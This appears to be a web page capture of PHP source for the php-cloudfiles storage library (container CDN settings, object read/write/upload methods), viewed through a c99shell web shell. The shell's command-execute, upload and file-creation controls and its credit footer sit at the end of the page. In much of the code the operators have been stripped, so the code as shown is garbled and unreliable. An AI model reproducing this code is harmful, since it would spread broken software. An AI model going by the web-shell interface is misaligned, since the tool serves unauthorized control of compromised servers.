     * @throws InvalidResponseException unexpected response
     */
    
function acl_referrer($cdn_acl_referrer="") {
        if (
$this->cfs_http->getCDNMUrl() == NULL) {
            throw new 
CDNNotEnabledException(
                
"Authentication response did not indicate CDN availability");
        }
        list(
$status,$reason) =
            
$this->cfs_http->update_cdn_container($this->name,
                                                  
$this->cdn_ttl,
                                                  
$this->cdn_log_retention,
                                                  
$this->cdn_acl_user_agent,
                                                  
$cdn_acl_referrer
                
);
        if (!
in_array($status, array(202,404))) {
            throw new 
InvalidResponseException(
                
"Invalid response (".$status."): ".$this->cfs_http->get_error());
        }
        
$this->cdn_acl_referrer $cdn_acl_referrer;
        return 
True;
    }

    
/**
     * Enable log retention for this CDN container.
     *
     * Enable CDN log retention on the container. If enabled logs will
     * be periodically (at unpredictable intervals) compressed and
     * uploaded to a ".CDN_ACCESS_LOGS" container in the form of
     * "container_name.YYYYMMDDHH-XXXX.gz". Requires CDN be enabled on
     * the account.
     *
     * Example:
     * <code>
     * # ... authentication code excluded (see previous examples) ...
     * #
     * $conn = new CF_Authentication($auth);
     *
     * $public_container = $conn->get_container("public");
     *
     * # Enable logs retention.
     * $public_container->log_retention(True);
     * </code>
     *
     * @returns boolean True if successful
     * @throws CDNNotEnabledException CDN functionality not returned during auth
     * @throws AuthenticationException if auth token is not valid/expired
     * @throws InvalidResponseException unexpected response
     */
    
function log_retention($cdn_log_retention=False) {
        if (
$this->cfs_http->getCDNMUrl() == NULL) {
            throw new 
CDNNotEnabledException(
                
"Authentication response did not indicate CDN availability");
        }
        list(
$status,$reason) =
            
$this->cfs_http->update_cdn_container($this->name,
                                                  
$this->cdn_ttl,
                                                  
$cdn_log_retention,
                                                  
$this->cdn_acl_user_agent,
                                                  
$this->cdn_acl_referrer
                
);
        if (!
in_array($status, array(202,404))) {
            throw new 
InvalidResponseException(
                
"Invalid response (".$status."): ".$this->cfs_http->get_error());
        }
        
$this->cdn_log_retention $cdn_log_retention;
        return 
True;
    }

    
/**
     * Disable the CDN sharing for this container
     *
     * Use this method to disallow distribution into the CDN of this Container's
     * content.
     *
     * NOTE: Any content already cached in the CDN will continue to be served
     *       from its cache until the TTL expiration transpires.  The default
     *       TTL is typically one day, so "privatizing" the Container will take
     *       up to 24 hours before the content is purged from the CDN cache.
     *
     * Example:
     * <code>
     * # ... authentication code excluded (see previous examples) ...
     * #
     * $conn = new CF_Authentication($auth);
     *
     * $public_container = $conn->get_container("public");
     *
     * # Disable CDN accessability
     * # ... still cached up to a month based on previous example
     * #
     * $public_container->make_private();
     * </code>
     *
     * @returns boolean True if successful
     * @throws CDNNotEnabledException CDN functionality not returned during auth
     * @throws AuthenticationException if auth token is not valid/expired
     * @throws InvalidResponseException unexpected response
     */
    
function make_private()
    {
        if (
$this->cfs_http->getCDNMUrl() == NULL) {
            throw new 
CDNNotEnabledException(
                
"Authentication response did not indicate CDN availability");
        }
        list(
$status,$reason) = $this->cfs_http->remove_cdn_container($this->name);
        
#if ($status == 401 && $this->_re_auth()) {
        #    return $this->make_private();
        #}
        
if (!in_array($status, array(202,404))) {
            throw new 
InvalidResponseException(
                
"Invalid response (".$status."): ".$this->cfs_http->get_error());
        }
        
$this->cdn_enabled False;
        
$this->cdn_ttl NULL;
        
$this->cdn_uri NULL;
        
$this->cdn_log_retention NULL;
        
$this->cdn_acl_user_agent NULL;
        
$this->cdn_acl_referrer NULL;
        return 
True;
    }

    
/**
     * Check if this Container is being publicly served via CDN
     *
     * Use this method to determine if the Container's content is currently
     * available through the CDN.
     *
     * Example:
     * <code>
     * # ... authentication code excluded (see previous examples) ...
     * #
     * $conn = new CF_Authentication($auth);
     *
     * $public_container = $conn->get_container("public");
     *
     * # Display CDN accessability
     * #
     * $public_container->is_public() ? print "Yes" : print "No";
     * </code>
     *
     * @returns boolean True if enabled, False otherwise
     */
    
function is_public()
    {
        return 
$this->cdn_enabled == True True False;
    }

    
/**
     * Create a new remote storage Object
     *
     * Return a new Object instance.  If the remote storage Object exists,
     * the instance's attributes are populated.
     *
     * Example:
     * <code>
     * # ... authentication code excluded (see previous examples) ...
     * #
     * $conn = new CF_Authentication($auth);
     *
     * $public_container = $conn->get_container("public");
     *
     * # This creates a local instance of a storage object but only creates
     * # it in the storage system when the object's write() method is called.
     * #
     * $pic = $public_container->create_object("baby.jpg");
     * </code>
     *
     * @param string $obj_name name of storage Object
     * @return obj CF_Object instance
     */
    
function create_object($obj_name=NULL)
    {
        return new 
CF_Object($this$obj_name);
    }

    
/**
     * Return an Object instance for the remote storage Object
     *
     * Given a name, return a Object instance representing the
     * remote storage object.
     *
     * Example:
     * <code>
     * # ... authentication code excluded (see previous examples) ...
     * #
     * $conn = new CF_Authentication($auth);
     *
     * $public_container = $conn->get_container("public");
     *
     * # This call only fetches header information and not the content of
     * # the storage object.  Use the Object's read() or stream() methods
     * # to obtain the object's data.
     * #
     * $pic = $public_container->get_object("baby.jpg");
     * </code>
     *
     * @param string $obj_name name of storage Object
     * @return obj CF_Object instance
     */
    
function get_object($obj_name=NULL)
    {
        return new 
CF_Object($this$obj_nameTrue);
    }

    
/**
     * Return a list of Objects
     *
     * Return an array of strings listing the Object names in this Container.
     *
     * Example:
     * <code>
     * # ... authentication code excluded (see previous examples) ...
     * #
     * $images = $conn->get_container("my photos");
     *
     * # Grab the list of all storage objects
     * #
     * $all_objects = $images->list_objects();
     *
     * # Grab subsets of all storage objects
     * #
     * $first_ten = $images->list_objects(10);
     *
     * # Note the use of the previous result's last object name being
     * # used as the 'marker' parameter to fetch the next 10 objects
     * #
     * $next_ten = $images->list_objects(10, $first_ten[count($first_ten)-1]);
     *
     * # Grab images starting with "birthday_party" and default limit/marker
     * # to match all photos with that prefix
     * #
     * $prefixed = $images->list_objects(0, NULL, "birthday");
     *
     * # Assuming you have created the appropriate directory marker Objects,
     * # you can traverse your pseudo-hierarchical containers
     * # with the "path" argument.
     * #
     * $animals = $images->list_objects(0,NULL,NULL,"pictures/animals");
     * $dogs = $images->list_objects(0,NULL,NULL,"pictures/animals/dogs");
     * </code>
     *
     * @param int $limit <i>optional</i> only return $limit names
     * @param int $marker <i>optional</i> subset of names starting at $marker
     * @param string $prefix <i>optional</i> Objects whose names begin with $prefix
     * @param string $path <i>optional</i> only return results under "pathname"
     * @return array array of strings
     * @throws InvalidResponseException unexpected response
     */
    
function list_objects($limit=0$marker=NULL$prefix=NULL$path=NULL)
    {
        list(
$status$reason$obj_list) =
            
$this->cfs_http->list_objects($this->name$limit,
                
$marker$prefix$path);
        
#if ($status == 401 && $this->_re_auth()) {
        #    return $this->list_objects($limit, $marker, $prefix, $path);
        #}
        
if ($status 200 || $status 299) {
            throw new 
InvalidResponseException(
                
"Invalid response (".$status."): ".$this->cfs_http->get_error());
        }
        return 
$obj_list;
    }

    
/**
     * Return an array of Objects
     *
     * Return an array of Object instances in this Container.
     *
     * Example:
     * <code>
     * # ... authentication code excluded (see previous examples) ...
     * #
     * $images = $conn->get_container("my photos");
     *
     * # Grab the list of all storage objects
     * #
     * $all_objects = $images->get_objects();
     *
     * # Grab subsets of all storage objects
     * #
     * $first_ten = $images->get_objects(10);
     *
     * # Note the use of the previous result's last object name being
     * # used as the 'marker' parameter to fetch the next 10 objects
     * #
     * $next_ten = $images->list_objects(10, $first_ten[count($first_ten)-1]);
     *
     * # Grab images starting with "birthday_party" and default limit/marker
     * # to match all photos with that prefix
     * #
     * $prefixed = $images->get_objects(0, NULL, "birthday");
     *
     * # Assuming you have created the appropriate directory marker Objects,
     * # you can traverse your pseudo-hierarchical containers
     * # with the "path" argument.
     * #
     * $animals = $images->get_objects(0,NULL,NULL,"pictures/animals");
     * $dogs = $images->get_objects(0,NULL,NULL,"pictures/animals/dogs");
     * </code>
     *
     * @param int $limit <i>optional</i> only return $limit names
     * @param int $marker <i>optional</i> subset of names starting at $marker
     * @param string $prefix <i>optional</i> Objects whose names begin with $prefix
     * @param string $path <i>optional</i> only return results under "pathname"
     * @return array array of strings
     * @throws InvalidResponseException unexpected response
     */
    
function get_objects($limit=0$marker=NULL$prefix=NULL$path=NULL)
    {
        list(
$status$reason$obj_array) =
            
$this->cfs_http->get_objects($this->name$limit,
                
$marker$prefix$path);
        
#if ($status == 401 && $this->_re_auth()) {
        #    return $this->get_objects($limit, $marker, $prefix, $path);
        #}
        
if ($status 200 || $status 299) {
            throw new 
InvalidResponseException(
                
"Invalid response (".$status."): ".$this->cfs_http->get_error());
        }
        
$objects = array();
        foreach (
$obj_array as $obj) {
            
$tmp = new CF_Object($this$obj["name"], FalseFalse);
            
$tmp->content_type $obj["content_type"];
            
$tmp->content_length = (float) $obj["bytes"];
            
$tmp->set_etag($obj["hash"]);
            
$tmp->last_modified $obj["last_modified"];
            
$objects[] = $tmp;
        }
        return 
$objects;
    }

    
/**
     * Delete a remote storage Object
     *
     * Given an Object instance or name, permanently remove the remote Object
     * and all associated metadata.
     *
     * Example:
     * <code>
     * # ... authentication code excluded (see previous examples) ...
     * #
     * $conn = new CF_Authentication($auth);
     *
     * $images = $conn->get_container("my photos");
     *
     * # Delete specific object
     * #
     * $images->delete_object("disco_dancing.jpg");
     * </code>
     *
     * @param obj $obj name or instance of Object to delete
     * @return boolean <kbd>True</kbd> if successfully removed
     * @throws SyntaxException invalid Object name
     * @throws NoSuchObjectException remote Object does not exist
     * @throws InvalidResponseException unexpected response
     */
    
function delete_object($obj)
    {
        
$obj_name NULL;
        if (
is_object($obj)) {
            if (
get_class($obj) == "CF_Object") {
                
$obj_name $obj->name;
            }
        }
        if (
is_string($obj)) {
            
$obj_name $obj;
        }
        if (!
$obj_name) {
            throw new 
SyntaxException("Object name not set.");
        }
        
$status $this->cfs_http->delete_object($this->name$obj_name);
        
#if ($status == 401 && $this->_re_auth()) {
        #    return $this->delete_object($obj);
        #}
        
if ($status == 404) {
            
$m "Specified object '".$this->name."/".$obj_name;
            
$m.= "' did not exist to delete.";
            throw new 
NoSuchObjectException($m);
        }
        if (
$status != 204) {
            throw new 
InvalidResponseException(
                
"Invalid response (".$status."): ".$this->cfs_http->get_error());
        }
        return 
True;
    }

    
/**
     * Helper function to create "path" elements for a given Object name
     *
     * Given an Object whos name contains '/' path separators, this function
     * will create the "directory marker" Objects of one byte with the
     * Content-Type of "application/folder".
     *
     * It assumes the last element of the full path is the "real" Object
     * and does NOT create a remote storage Object for that last element.
     */
    
function create_paths($path_name)
    {
        if (
$path_name[0] == '/') {
            
$path_name mb_substr($path_name01);
        }
        
$elements explode('/'$path_name, -1);
        
$build_path "";
        foreach (
$elements as $idx => $val) {
            if (!
$build_path) {
                
$build_path $val;
            } else {
                
$build_path .= "/" $val;
            }
            
$obj = new CF_Object($this$build_path);
            
$obj->content_type "application/directory";
            
$obj->write("."1);
        }
    }

    
/**
     * Internal method to grab CDN/Container info if appropriate to do so
     *
     * @throws InvalidResponseException unexpected response
     */
    
private function _cdn_initialize()
    {
        list(
$status$reason$cdn_enabled$cdn_uri$cdn_ttl,
             
$cdn_log_retention$cdn_acl_user_agent$cdn_acl_referrer) =
            
$this->cfs_http->head_cdn_container($this->name);
        
#if ($status == 401 && $this->_re_auth()) {
        #    return $this->_cdn_initialize();
        #}
        
if (!in_array($status, array(204,404))) {
            throw new 
InvalidResponseException(
                
"Invalid response (".$status."): ".$this->cfs_http->get_error());
        }
        
$this->cdn_enabled $cdn_enabled;
        
$this->cdn_uri $cdn_uri;
        
$this->cdn_ttl $cdn_ttl;
        
$this->cdn_log_retention $cdn_log_retention;
        
$this->cdn_acl_user_agent $cdn_acl_user_agent;
        
$this->cdn_acl_referrer $cdn_acl_referrer;
    }

    
#private function _re_auth()
    #{
    #    $new_auth = new CF_Authentication(
    #        $this->cfs_auth->username,
    #        $this->cfs_auth->api_key,
    #        $this->cfs_auth->auth_host,
    #        $this->cfs_auth->account);
    #    $new_auth->authenticate();
    #    $this->cfs_auth = $new_auth;
    #    $this->cfs_http->setCFAuth($this->cfs_auth);
    #    return True;
    #}
}


/**
 * Object operations
 *
 * An Object is analogous to a file on a conventional filesystem. You can
 * read data from, or write data to your Objects. You can also associate
 * arbitrary metadata with them.
 *
 * @package php-cloudfiles
 */
class CF_Object
{
    public 
$container;
    public 
$name;
    public 
$last_modified;
    public 
$content_type;
    public 
$content_length;
    public 
$metadata;
    private 
$etag;

    
/**
     * Class constructor
     *
     * @param obj $container CF_Container instance
     * @param string $name name of Object
     * @param boolean $force_exists if set, throw an error if Object doesn't exist
     */
    
function __construct(&$container$name$force_exists=False$dohead=True)
    {
        if (
$name[0] == "/") {
            
$r "Object name '".$name;
            
$r .= "' cannot contain begin with a '/' character.";
            throw new 
SyntaxException($r);
        }
        if (
strlen($name) > MAX_OBJECT_NAME_LEN) {
            throw new 
SyntaxException("Object name exceeds "
                
"maximum allowed length.");
        }
        
$this->container $container;
        
$this->name $name;
        
$this->etag NULL;
        
$this->_etag_override False;
        
$this->last_modified NULL;
        
$this->content_type NULL;
        
$this->content_length 0;
        
$this->metadata = array();
        if (
$dohead) {
            if (!
$this->_initialize() && $force_exists) {
                throw new 
NoSuchObjectException("No such object '".$name."'");
            }
        }
    }

    
/**
     * String representation of Object
     *
     * Pretty print the Object's location and name
     *
     * @return string Object information
     */
    
function __toString()
    {
        return 
$this->container->name "/" $this->name;
    }

    
/**
     * Internal check to get the proper mimetype.
     *
     * This function would go over the available PHP methods to get
     * the MIME type.
     *
     * By default it will try to use the PHP fileinfo library which is
     * available from PHP 5.3 or as an PECL extension
     * (http://pecl.php.net/package/Fileinfo).
     *
     * It will get the magic file by default from the system wide file
     * which is usually available in /usr/share/magic on Unix or try
     * to use the file specified in the source directory of the API
     * (share directory).
     *
     * if fileinfo is not available it will try to use the internal
     * mime_content_type function.
     *
     * @param string $handle name of file or buffer to guess the type from
     * @return boolean <kbd>True</kbd> if successful
     * @throws BadContentTypeException
     */
    
function _guess_content_type($handle) {
        if (
$this->content_type)
            return;

        
w3_require_once(W3TC_INC_DIR '/functions/mime.php');

        
$this->content_type w3_get_mime_type($handle);

        if (!
$this->content_type) {
            throw new 
BadContentTypeException("Required Content-Type not set");
        }

        return 
True;
    }

    
/**
     * String representation of the Object's public URI
     *
     * A string representing the Object's public URI assuming that it's
     * parent Container is CDN-enabled.
     *
     * Example:
     * <code>
     * # ... authentication/connection/container code excluded
     * # ... see previous examples
     *
     * # Print out the Object's CDN URI (if it has one) in an HTML img-tag
     * #
     * print "<img src='$pic->public_uri()' />\n";
     * </code>
     *
     * @return string Object's public URI or NULL
     */
    
function public_uri()
    {
        if (
$this->container->cdn_enabled) {
            return 
$this->container->cdn_uri "/" $this->name;
        }
        return 
NULL;
    }

    
/**
     * Read the remote Object's data
     *
     * Returns the Object's data.  This is useful for smaller Objects such
     * as images or office documents.  Object's with larger content should use
     * the stream() method below.
     *
     * Pass in $hdrs array to set specific custom HTTP headers such as
     * If-Match, If-None-Match, If-Modified-Since, Range, etc.
     *
     * Example:
     * <code>
     * # ... authentication/connection/container code excluded
     * # ... see previous examples
     *
     * $my_docs = $conn->get_container("documents");
     * $doc = $my_docs->get_object("README");
     * $data = $doc->read(); # read image content into a string variable
     * print $data;
     *
     * # Or see stream() below for a different example.
     * #
     * </code>
     *
     * @param array $hdrs user-defined headers (Range, If-Match, etc.)
     * @return string Object's data
     * @throws InvalidResponseException unexpected response
     */
    
function read($hdrs=array())
    {
        list(
$status$reason$data) =
            
$this->container->cfs_http->get_object_to_string($this$hdrs);
        
#if ($status == 401 && $this->_re_auth()) {
        #    return $this->read($hdrs);
        #}
        
if (($status 200) || ($status 299
                
&& $status != 412 && $status != 304)) {
            throw new 
InvalidResponseException("Invalid response (".$status."): "
                
$this->container->cfs_http->get_error());
        }
        return 
$data;
    }

    
/**
     * Streaming read of Object's data
     *
     * Given an open PHP resource (see PHP's fopen() method), fetch the Object's
     * data and write it to the open resource handle.  This is useful for
     * streaming an Object's content to the browser (videos, images) or for
     * fetching content to a local file.
     *
     * Pass in $hdrs array to set specific custom HTTP headers such as
     * If-Match, If-None-Match, If-Modified-Since, Range, etc.
     *
     * Example:
     * <code>
     * # ... authentication/connection/container code excluded
     * # ... see previous examples
     *
     * # Assuming this is a web script to display the README to the
     * # user's browser:
     * #
     * <?php
     * // grab README from storage system
     * //
     * $my_docs = $conn->get_container("documents");
     * $doc = $my_docs->get_object("README");
     *
     * // Hand it back to user's browser with appropriate content-type
     * //
     * header("Content-Type: " . $doc->content_type);
     * $output = fopen("php://output", "w");
     * $doc->stream($output); # stream object content to PHP's output buffer
     * fclose($output);
     * ?>
     *
     * # See read() above for a more simple example.
     * #
     * </code>
     *
     * @param resource $fp open resource for writing data to
     * @param array $hdrs user-defined headers (Range, If-Match, etc.)
     * @return string Object's data
     * @throws InvalidResponseException unexpected response
     */
    
function stream(&$fp$hdrs=array())
    {
        list(
$status$reason) =
                
$this->container->cfs_http->get_object_to_stream($this,$fp,$hdrs);
        
#if ($status == 401 && $this->_re_auth()) {
        #    return $this->stream($fp, $hdrs);
        #}
        
if (($status 200) || ($status 299
                
&& $status != 412 && $status != 304)) {
            throw new 
InvalidResponseException("Invalid response (".$status."): "
                
.$reason);
        }
        return 
True;
    }

    
/**
     * Store new Object metadata
     *
     * Write's an Object's metadata to the remote Object.  This will overwrite
     * an prior Object metadata.
     *
     * Example:
     * <code>
     * # ... authentication/connection/container code excluded
     * # ... see previous examples
     *
     * $my_docs = $conn->get_container("documents");
     * $doc = $my_docs->get_object("README");
     *
     * # Define new metadata for the object
     * #
     * $doc->metadata = array(
     *     "Author" => "EJ",
     *     "Subject" => "How to use the PHP tests",
     *     "Version" => "1.2.2"
     * );
     *
     * # Push the new metadata up to the storage system
     * #
     * $doc->sync_metadata();
     * </code>
     *
     * @return boolean <kbd>True</kbd> if successful, <kbd>False</kbd> otherwise
     * @throws InvalidResponseException unexpected response
     */
    
function sync_metadata()
    {
        if (!empty(
$this->metadata)) {
            
$status $this->container->cfs_http->update_object($this);
            
#if ($status == 401 && $this->_re_auth()) {
            #    return $this->sync_metadata();
            #}
            
if ($status != 202) {
                throw new 
InvalidResponseException("Invalid response ("
                    
.$status."): ".$this->container->cfs_http->get_error());
            }
            return 
True;
        }
        return 
False;
    }

    
/**
     * Upload Object's data to Cloud Files
     *
     * Write data to the remote Object.  The $data argument can either be a
     * PHP resource open for reading (see PHP's fopen() method) or an in-memory
     * variable.  If passing in a PHP resource, you must also include the $bytes
     * parameter.
     *
     * Example:
     * <code>
     * # ... authentication/connection/container code excluded
     * # ... see previous examples
     *
     * $my_docs = $conn->get_container("documents");
     * $doc = $my_docs->get_object("README");
     *
     * # Upload placeholder text in my README
     * #
     * $doc->write("This is just placeholder text for now...");
     * </code>
     *
     * @param string|resource $data string or open resource
     * @param float $bytes amount of data to upload (required for resources)
     * @param boolean $verify generate, send, and compare MD5 checksums
     * @return boolean <kbd>True</kbd> when data uploaded successfully
     * @throws SyntaxException missing required parameters
     * @throws BadContentTypeException if no Content-Type was/could be set
     * @throws MisMatchedChecksumException $verify is set and checksums unequal
     * @throws InvalidResponseException unexpected response
     */
    
function write($data=NULL$bytes=0$verify=True)
    {
        if (!
$data) {
            throw new 
SyntaxException("Missing data source.");
        }
        if (
$bytes MAX_OBJECT_SIZE) {
            throw new 
SyntaxException("Bytes exceeds maximum object size.");
        }
        if (
$verify) {
            if (!
$this->_etag_override) {
                
$this->etag $this->compute_md5sum($data);
            }
        } else {
            
$this->etag NULL;
        }

        
$close_fh False;
        if (!
is_resource($data)) {
            
# A hack to treat string data as a file handle.  php://memory feels
            # like a better option, but it seems to break on Windows so use
            # a temporary file instead.
            #
            
$fp fopen("php://temp""wb+");
            
#$fp = fopen("php://memory", "wb+");
            
fwrite($fp$datastrlen($data));
            
rewind($fp);
            
$close_fh True;
            
$this->content_length = (float) strlen($data);
            if (
$this->content_length MAX_OBJECT_SIZE) {
                throw new 
SyntaxException("Data exceeds maximum object size");
            }
            
$ct_data substr($data064);
        } else {
            
$this->content_length $bytes;
            
$fp $data;
            
$ct_data fread($data64);
            
rewind($data);
        }

        
$this->_guess_content_type($ct_data);

        list(
$status$reason$etag) =
                
$this->container->cfs_http->put_object($this$fp);
        
#if ($status == 401 && $this->_re_auth()) {
        #    return $this->write($data, $bytes, $verify);
        #}
        
if ($status == 412) {
            if (
$close_fh) { fclose($fp); }
            throw new 
SyntaxException("Missing Content-Type header");
        }
        if (
$status == 422) {
            if (
$close_fh) { fclose($fp); }
            throw new 
MisMatchedChecksumException(
                
"Supplied and computed checksums do not match.");
        }
        if (
$status != 201) {
            if (
$close_fh) { fclose($fp); }
            throw new 
InvalidResponseException("Invalid response (".$status."): "
                
$this->container->cfs_http->get_error());
        }
        if (!
$verify) {
            
$this->etag $etag;
        }
        if (
$close_fh) { fclose($fp); }
        return 
True;
    }

    
/**
     * Upload Object data from local filename
     *
     * This is a convenience function to upload the data from a local file.  A
     * True value for $verify will cause the method to compute the Object's MD5
     * checksum prior to uploading.
     *
     * Example:
     * <code>
     * # ... authentication/connection/container code excluded
     * # ... see previous examples
     *
     * $my_docs = $conn->get_container("documents");
     * $doc = $my_docs->get_object("README");
     *
     * # Upload my local README's content
     * #
     * $doc->load_from_filename("/home/ej/cloudfiles/readme");
     * </code>
     *
     * @param string $filename full path to local file
     * @param boolean $verify enable local/remote MD5 checksum validation
     * @return boolean <kbd>True</kbd> if data uploaded successfully
     * @throws SyntaxException missing required parameters
     * @throws BadContentTypeException if no Content-Type was/could be set
     * @throws MisMatchedChecksumException $verify is set and checksums unequal
     * @throws InvalidResponseException unexpected response
     * @throws IOException error opening file
     */
    
function load_from_filename($filename$verify=True)
    {
        
$fp = @fopen($filename"r");
        if (!
$fp) {
            throw new 
IOException("Could not open file for reading: ".$filename);
        }

        
clearstatcache();

        
$size = (float) sprintf("%u"filesize($filename));
        if (
$size MAX_OBJECT_SIZE) {
            throw new 
SyntaxException("File size exceeds maximum object size.");
        }

        
$this->_guess_content_type($filename);

        
$this->write($fp$size$verify);
        
fclose($fp);
        return 
True;
    }

    
/**
     * Save Object's data to local filename
     *
     * Given a local filename, the Object's data will be written to the newly
     * created file.
     *
     * Example:
     * <code>
     * # ... authentication/connection/container code excluded
     * # ... see previous examples
     *
     * # Whoops!  I deleted my local README, let me download/save it
     * #
     * $my_docs = $conn->get_container("documents");
     * $doc = $my_docs->get_object("README");
     *
     * $doc->save_to_filename("/home/ej/cloudfiles/readme.restored");
     * </code>
     *
     * @param string $filename name of local file to write data to
     * @return boolean <kbd>True</kbd> if successful
     * @throws IOException error opening file
     * @throws InvalidResponseException unexpected response
     */
    
function save_to_filename($filename)
    {
        
$fp = @fopen($filename"wb");
        if (!
$fp) {
            throw new 
IOException("Could not open file for writing: ".$filename);
        }
        
$result $this->stream($fp);
        
fclose($fp);
        return 
$result;
    }

    
/**
     * Set Object's MD5 checksum
     *
     * Manually set the Object's ETag.  Including the ETag is mandatory for
     * Cloud Files to perform end-to-end verification.  Omitting the ETag forces
     * the user to handle any data integrity checks.
     *
     * @param string $etag MD5 checksum hexidecimal string
     */
    
function set_etag($etag)
    {
        
$this->etag $etag;
        
$this->_etag_override True;
    }

    
/**
     * Object's MD5 checksum
     *
     * Accessor method for reading Object's private ETag attribute.
     *
     * @return string MD5 checksum hexidecimal string
     */
    
function getETag()
    {
        return 
$this->etag;
    }

    
/**
     * Compute the MD5 checksum
     *
     * Calculate the MD5 checksum on either a PHP resource or data.  The argument
     * may either be a local filename, open resource for reading, or a string.
     *
     * <b>WARNING:</b> if you are uploading a big file over a stream
     * it could get very slow to compute the md5 you probably want to
     * set the $verify parameter to False in the write() method and
     * compute yourself the md5 before if you have it.
     *
     * @param filename|obj|string $data filename, open resource, or string
     * @return string MD5 checksum hexidecimal string
     */
    
function compute_md5sum(&$data)
    {

        if (
function_exists("hash_init") && is_resource($data)) {
            
$ctx hash_init('md5');
            while (!
feof($data)) {
                
$buffer fgets($data65536);
                
hash_update($ctx$buffer);
            }
            
$md5 hash_final($ctxfalse);
            
rewind($data);
        } elseif ((string)
is_file($data)) {
            
$md5 md5_file($data);
        } else {
            
$md5 md5($data);
        }
        return 
$md5;
    }

    
/**
     * PRIVATE: fetch information about the remote Object if it exists
     */
    
private function _initialize()
    {
        list(
$status$reason$etag$last_modified$content_type,
            
$content_length$metadata) =
                
$this->container->cfs_http->head_object($this);
        
#if ($status == 401 && $this->_re_auth()) {
        #    return $this->_initialize();
        #}
        
if ($status == 404) {
            return 
False;
        }
        if (
$status 200 || $status 299) {
            throw new 
InvalidResponseException("Invalid response (".$status."): "
                
$this->container->cfs_http->get_error());
        }
        
$this->etag $etag;
        
$this->last_modified $last_modified;
        
$this->content_type $content_type;
        
$this->content_length $content_length;
        
$this->metadata $metadata;
        return 
True;
    }

    
#private function _re_auth()
    #{
    #    $new_auth = new CF_Authentication(
    #        $this->cfs_auth->username,
    #        $this->cfs_auth->api_key,
    #        $this->cfs_auth->auth_host,
    #        $this->cfs_auth->account);
    #    $new_auth->authenticate();
    #    $this->container->cfs_auth = $new_auth;
    #    $this->container->cfs_http->setCFAuth($this->cfs_auth);
    #    return True;
    #}
}

/* vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4: */

/*
 * Local variables:
 * tab-width: 4
 * c-basic-offset: 4
 * c-hanging-comment-ender-p: nil
 * End:
 */
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--